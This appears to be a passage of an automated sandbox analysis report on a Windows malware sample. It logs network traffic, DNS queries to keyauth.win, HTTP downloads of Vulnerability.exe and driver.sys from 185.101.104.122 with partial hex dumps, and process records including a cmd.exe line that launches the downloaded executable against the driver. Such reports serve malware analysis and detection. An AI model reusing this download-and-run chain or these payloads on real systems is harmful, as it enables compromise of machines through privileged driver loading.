                                                  Oct 20, 2024 21:15:02.739099026 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.739161015 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.739938021 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.739974022 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.740067005 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.740976095 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.741009951 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.741054058 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.741111040 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.742252111 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.742288113 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.742333889 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.742333889 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.743515015 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.743561983 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.743578911 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.743628979 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.744795084 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.744829893 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.744898081 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.744927883 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.744965076 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.745055914 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.746160030 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.746193886 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.746262074 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.746262074 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.747467041 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.747500896 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.747524977 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.747541904 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.751133919 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.751169920 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.751251936 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.751251936 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.751776934 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.751813889 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.751846075 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.751859903 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.751859903 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.751902103 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.755402088 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.755592108 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.877007961 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.877190113 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.877196074 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.877230883 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.877244949 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.877278090 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.877973080 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.878032923 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.878251076 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.878285885 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.878309011 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.878331900 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.879153013 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.879209042 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.879211903 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.879251957 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.880100965 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.880136013 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.880158901 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.880182028 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.881397963 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.881433964 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.881455898 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.881477118 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.881987095 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.882039070 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.882052898 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.882074118 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.882085085 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.882122993 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.882888079 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.882924080 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.882946014 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.882968903 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.883814096 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.883848906 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.883869886 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.883882999 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.883893013 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.883928061 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.884744883 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.884802103 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.884803057 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.884849072 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.885662079 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.885710955 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.885719061 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.885756969 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.886629105 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.886663914 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.886684895 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.886702061 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.887883902 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.887917995 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.887937069 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.887949944 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.887960911 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.887995005 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.888781071 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.888814926 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.888835907 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.888851881 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.889714003 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.889750004 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.889770031 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.889795065 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.890655041 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.890691042 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.890711069 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.890729904 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.891573906 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.891608953 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.891629934 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.891643047 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:02.891649961 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.891689062 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.912327051 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:02.918220043 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152214050 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152292013 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.152371883 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152409077 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152504921 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.152506113 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.152915001 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152950048 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.152961016 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.152995110 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.153681040 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.153714895 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.153729916 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.153757095 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.154524088 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.154560089 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.154581070 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.154608011 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:03.155447960 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:03.155504942 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:08.245130062 CEST8049704185.101.104.122192.168.2.5
                                                  Oct 20, 2024 21:15:08.245289087 CEST4970480192.168.2.5185.101.104.122
                                                  Oct 20, 2024 21:15:14.746350050 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:14.746403933 CEST44349710172.67.72.57192.168.2.5
                                                  Oct 20, 2024 21:15:14.746484995 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:14.759135962 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:14.759149075 CEST44349710172.67.72.57192.168.2.5
                                                  Oct 20, 2024 21:15:15.562138081 CEST44349710172.67.72.57192.168.2.5
                                                  Oct 20, 2024 21:15:15.562238932 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:17.508948088 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:17.508976936 CEST44349710172.67.72.57192.168.2.5
                                                  Oct 20, 2024 21:15:17.509155989 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:17.509649992 CEST44349710172.67.72.57192.168.2.5
                                                  Oct 20, 2024 21:15:17.509715080 CEST49710443192.168.2.5172.67.72.57
                                                  Oct 20, 2024 21:15:18.792479038 CEST4970480192.168.2.5185.101.104.122
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Oct 20, 2024 21:15:14.733629942 CEST6184853192.168.2.51.1.1.1
                                                  Oct 20, 2024 21:15:14.741652966 CEST53618481.1.1.1192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Oct 20, 2024 21:15:14.733629942 CEST192.168.2.51.1.1.10x4d71Standard query (0)keyauth.winA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Oct 20, 2024 21:15:14.741652966 CEST1.1.1.1192.168.2.50x4d71No error (0)keyauth.win172.67.72.57A (IP address)IN (0x0001)false
                                                  Oct 20, 2024 21:15:14.741652966 CEST1.1.1.1192.168.2.50x4d71No error (0)keyauth.win104.26.0.5A (IP address)IN (0x0001)false
                                                  Oct 20, 2024 21:15:14.741652966 CEST1.1.1.1192.168.2.50x4d71No error (0)keyauth.win104.26.1.5A (IP address)IN (0x0001)false
                                                  • 185.101.104.122
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.549704185.101.104.122801308C:\Users\user\Desktop\Iyto7FYCJO.exe
                                                  TimestampBytes transferredDirectionData
                                                  Oct 20, 2024 21:15:01.025322914 CEST311OUTGET /Vulnerability.exe HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: 185.101.104.122
                                                  Connection: Keep-Alive
                                                  Oct 20, 2024 21:15:02.424665928 CEST1236INHTTP/1.1 200 OK
                                                  Date: Sun, 20 Oct 2024 19:15:02 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Thu, 03 Oct 2024 17:41:18 GMT
                                                  ETag: "23800-623960fde9891"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 145408
                                                  Keep-Alive: timeout=5, max=100
                                                  Connection: Keep-Alive
                                                  Content-Type: application/x-msdownload
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7d e7 f2 38 39 86 9c 6b 39 86 9c 6b 39 86 9c 6b 30 fe 0f 6b 2f 86 9c 6b 3f 07 98 6a 33 86 9c 6b 3f 07 9f 6a 3d 86 9c 6b 3f 07 99 6a 1b 86 9c 6b 3f 07 9d 6a 3f 86 9c 6b 72 fe 9d 6a 28 86 9c 6b 39 86 9d 6b 31 87 9c 6b 56 07 95 6a 3e 86 9c 6b 56 07 63 6b 38 86 9c 6b 56 07 9e 6a 38 86 9c 6b 52 69 63 68 39 86 9c 6b 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3e d7 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 4e 01 00 00 ee 00 00 00 00 00 00 b4 48 01 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 02 00 00 04 00 00 00 00 00 00 03 00 60 81 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}89k9k9k0k/k?j3k?j=k?jk?j?krj(k9k1kVj>kVck8kVj8kRich9kPEd>f"&NH@p`P@0`p(p@`.textLN `.rdata`R@@.data0@.pdata0@$@@.rsrcP4@@.reloc`6@B
                                                  Oct 20, 2024 21:15:02.424912930 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                  Data Ascii: HL`3H%LT3HY+LD$LL$ SUVWH8IHl$xHHHl$(LLHD$ HHHU
                                                  Oct 20, 2024 21:15:02.424951077 CEST1236INData Raw: 00 00 45 8b e6 42 0f b6 4c 08 03 c1 e1 08 8b d0 42 0f b6 44 08 02 0b c8 c1 e1 08 42 0f b6 44 0a 01 0b c8 42 0f b6 04 0a c1 e1 08 0b c8 42 0f b6 44 0a 06 89 4c 24 30 42 0f b6 4c 0a 07 c1 e1 08 0b c8 42 0f b6 44 0a 05 c1 e1 08 0b c8 42 0f b6 44 0a
                                                  Data Ascii: EBLBDBDBBDL$0BLBDBDADL$4ALADADADL$8ALADADADL$<ALADADADL$@ALAD
                                                  Oct 20, 2024 21:15:02.425832987 CEST636INData Raw: b6 8c 26 9c c1 01 00 8b d8 44 8b 44 94 30 41 83 c1 04 47 03 84 26 9c c0 01 00 49 83 c6 10 45 03 c2 44 03 c6 41 d3 c0 41 03 c0 41 83 f9 40 0f 82 c9 fd ff ff 8b b4 24 d8 00 00 00 44 03 ef 8b 6c 24 20 03 f0 8b 44 24 24 03 eb 44 8b a4 24 c8 00 00 00
                                                  Data Ascii: &DD0AG&IEDAAA@$Dl$ D$$D$@LL$(E$l$ D$D$$A;L$D$I7KH\$xAAD$AAD$AD$AD$AD$AD$AAD$AE,$AA
                                                  Oct 20, 2024 21:15:02.425867081 CEST1236INData Raw: 0f 57 c9 f3 0f 7f 4c 24 40 41 8b ff 4c 89 7c 24 50 48 85 ed 74 72 48 b8 ff ff ff ff ff ff ff 7f 48 3b e8 0f 87 3c 02 00 00 48 81 fd 00 10 00 00 72 29 48 8d 4d 27 48 3b cd 0f 86 20 02 00 00 e8 15 25 01 00 48 85 c0 0f 84 7b 01 00 00 48 8d 58 27 48
                                                  Data Ascii: WL$@AL|$PHtrHH;<Hr)HM'H; %H{HX'HHCH$HH\$@H<+H|$PL3H2H|$HH\$@LHH$EHHHcHHEDHHL$XD$XAL$hANfoD$hD$XH
                                                  Oct 20, 2024 21:15:02.426953077 CEST1236INData Raw: 4d d0 33 d2 ff 15 5b 40 01 00 85 c0 0f 85 40 01 00 00 ff 15 ad 3f 01 00 3d b7 00 00 00 0f 84 2f 01 00 00 0f 57 c0 41 0f 11 07 4d 89 6f 10 4d 89 6f 18 45 33 c0 48 8d 15 02 49 01 00 49 8b cf e8 29 a9 00 00 90 48 8b 55 08 48 83 fa 0f 76 31 48 ff c2
                                                  Data Ascii: M3[@@?=/WAMoMoE3HII)HUHv1HHMHHrH'HIH+HHLmHEEHUHv1HHMHHrH'HIH+HHLmHEEIVHv0HIHr
                                                  Oct 20, 2024 21:15:02.426987886 CEST1236INData Raw: 01 00 f3 0f 7f 44 24 60 c6 44 24 50 00 4c 8b 6d c0 49 8b c4 49 2b c5 48 83 f8 04 0f 82 32 16 00 00 4c 8d 4d b0 48 83 7d c8 0f 4c 0f 47 4d b0 4c 89 4c 24 40 0f 57 c0 0f 11 45 18 0f 57 c9 f3 0f 7f 4d 28 49 8d 55 04 bb 0f 00 00 00 4c 8d 65 18 8d 4b
                                                  Data Ascii: D$`D$PLmII+H2LMH}LGMLL$@WEWM(IULeKIH;HHHH;v0HI@'H&HL`'IID$IULL$@>H;HBHKHrHA'H;nHtLIULL$@E3LeHU(H
                                                  Oct 20, 2024 21:15:02.428085089 CEST1236INData Raw: ff 15 9f 3b 01 00 cc 48 8b cb e8 a6 15 01 00 90 48 8b 45 58 48 83 f8 0f 76 36 48 8d 50 01 49 8b c4 48 81 fa 00 10 00 00 72 1d 48 83 c2 27 4d 8b 64 24 f8 49 2b c4 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 5f 3b 01 00 cc 49 8b cc e8 66 15 01 00 90 48 8d
                                                  Data Ascii: ;HHEXHv6HPIHrH'Md$I+HHv_;IfHLco<L3]AEdf;u-IHIETHD$pIUPHD$xC8Dc<ALf;MHHD$p<Q7IHD$xMeTIEPHD9
                                                  Oct 20, 2024 21:15:02.428118944 CEST1236INData Raw: 83 f8 1f 0f 87 c1 09 00 00 e8 d3 10 01 00 48 89 5d 00 48 c7 45 08 0f 00 00 00 c6 45 f0 00 48 8b 55 e8 48 83 fa 0f 76 31 48 8b 4d d0 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 19 48 8b 49 f8 48 2b c1 48 83 c2 27 48 83 c0 f8 48 83 f8 1f 0f 87 c4 09
                                                  Data Ascii: H]HEEHUHv1HMHHHrHIH+H'HHEHEH]IVHHHIrH'LAI+HAHI:I^IFAHMH}HGM03AH1IMAdH
                                                  Oct 20, 2024 21:15:02.428153038 CEST1236INData Raw: 00 00 48 63 48 04 4c 8d 2d b8 8e 01 00 4c 89 ac 0d f0 01 00 00 48 8b 85 f0 01 00 00 48 63 48 04 8d 91 58 ff ff ff 89 94 0d ec 01 00 00 48 8d 8d f8 01 00 00 ff 15 93 2f 01 00 48 8d 05 34 55 01 00 48 89 85 f8 01 00 00 c6 85 74 02 00 00 00 c6 85 69
                                                  Data Ascii: HcHL-LHHcHXH/H4UHtiHZ/E3LxHAHlL`ED$HHmHu$HHcHHHE3AT$'-HHcHLHHcHXHH
                                                  Oct 20, 2024 21:15:02.431869030 CEST1236INData Raw: f0 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 01 2d 01 00 cc e8 0b 07 01 00 48 89 5d 00 48 c7 45 08 0f 00 00 00 c6 45 f0 00 48 8b 55 e8 48 83 fa 0f 76 34 48 ff c2 48 8b 4d d0 48 8b c1
                                                  Data Ascii: HHrH'HIH+HHv-H]HEEHUHv4HHMHHrH'HIH+HHv,H]HEEIVHHIHH'LAI+HAH],2Y'WAI_I_E3H)0I
                                                  Oct 20, 2024 21:15:02.912327051 CEST304OUTGET /driver.sys HTTP/1.1
                                                  Accept: */*
                                                  UA-CPU: AMD64
                                                  Accept-Encoding: gzip, deflate
                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                  Host: 185.101.104.122
                                                  Connection: Keep-Alive
                                                  Oct 20, 2024 21:15:03.152214050 CEST1236INHTTP/1.1 200 OK
                                                  Date: Sun, 20 Oct 2024 19:15:03 GMT
                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                  Last-Modified: Thu, 03 Oct 2024 19:27:48 GMT
                                                  ETag: "2a00-623978cbb6377"
                                                  Accept-Ranges: bytes
                                                  Content-Length: 10752
                                                  Keep-Alive: timeout=5, max=99
                                                  Connection: Keep-Alive
                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 11 41 b6 a6 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 55 20 d8 f5 54 20 d8 f5 1e 58 d9 f4 56 20 d8 f5 55 20 d9 f5 4e 20 d8 f5 1e 58 db f4 53 20 d8 f5 1e 58 dc f4 50 20 d8 f5 3a a1 dd f4 54 20 d8 f5 3a a1 da f4 54 20 d8 f5 52 69 63 68 55 20 d8 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 34 f0 fe 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 26 00 18 00 00 00 0e 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 0a 00 00 00 00 00 00 00 00 80 00 00 00 04 00 00 74 b0 00 00 01 00 60 41 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AU U U U T XV U N XS XP :T :T RichU PEd4f"&@t`A`(Pp$`28 1@0.text h.rdataP0@H.data@ @.pdataP"@HINIT`$ b.reloc$p(@B


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:15:14:59
                                                  Start date:20/10/2024
                                                  Path:C:\Users\user\Desktop\Iyto7FYCJO.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\user\Desktop\Iyto7FYCJO.exe"
                                                  Imagebase:0x7ff7a2710000
                                                  File size:6'070'784 bytes
                                                  MD5 hash:E12627A292CF6A7D32ADB932ADBD2B3B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:15:14:59
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6d64d0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:15:15:04
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c cd C:\
                                                  Imagebase:0x7ff703a40000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:15:15:04
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Windows\Vulnerability.exe C:\Windows\driver.sys
                                                  Imagebase:0x7ff703a40000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:15:15:04
                                                  Start date:20/10/2024
                                                  Path:C:\Windows\Vulnerability.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Vulnerability.exe C:\Windows\driver.sys
                                                  Imagebase:0x7ff7738e0000
                                                  File size:145'408 bytes
                                                  MD5 hash:8619AFEC8BD66B2C589FC987D7D0B194
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
